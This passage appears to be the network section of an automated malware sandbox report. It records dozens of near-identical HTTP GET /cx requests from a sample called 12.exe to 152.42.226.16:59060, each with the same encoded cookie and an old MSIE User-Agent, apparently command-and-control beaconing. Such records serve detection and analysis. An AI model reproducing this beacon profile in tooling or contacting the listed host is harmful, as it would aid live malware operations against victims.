                          21192.168.2.449764152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:00.131360054 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.449770152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:03.033688068 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.449776152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:05.984513998 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.449782152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:08.875693083 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.449788152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:11.766458035 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.449794152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:14.654863119 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.449805152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:17.548139095 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.449811152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:20.445466042 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.449817152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:23.509773970 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.449823152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:26.454684973 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.449829152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:29.422482967 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.449839152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:32.329576015 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.449846152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:35.282052994 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.449852152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:38.175260067 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.449858152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:41.077363968 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.449869152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:43.975519896 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.449875152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:46.910454988 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.449881152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:49.798528910 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          39192.168.2.449887152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:52.706290007 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          40192.168.2.449896152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:55.766638041 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          41192.168.2.449904152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:29:58.656970024 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          42192.168.2.449910152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:01.581043959 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          43192.168.2.449916152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:04.487708092 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          44192.168.2.449925152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:07.375737906 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          45192.168.2.449933152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:10.273402929 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          46192.168.2.449939152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:13.159877062 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          47192.168.2.449945152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:16.272543907 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          48192.168.2.449954152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:19.157583952 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          49192.168.2.449962152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:22.064928055 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          50192.168.2.449968152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:24.961429119 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          51192.168.2.449973152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:27.845325947 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          52192.168.2.449978152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:30.744345903 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          53192.168.2.449987152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:33.642071962 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          54192.168.2.449994152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:36.584374905 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          55192.168.2.450000152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:39.533180952 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          56192.168.2.450009152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:30:42.461770058 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
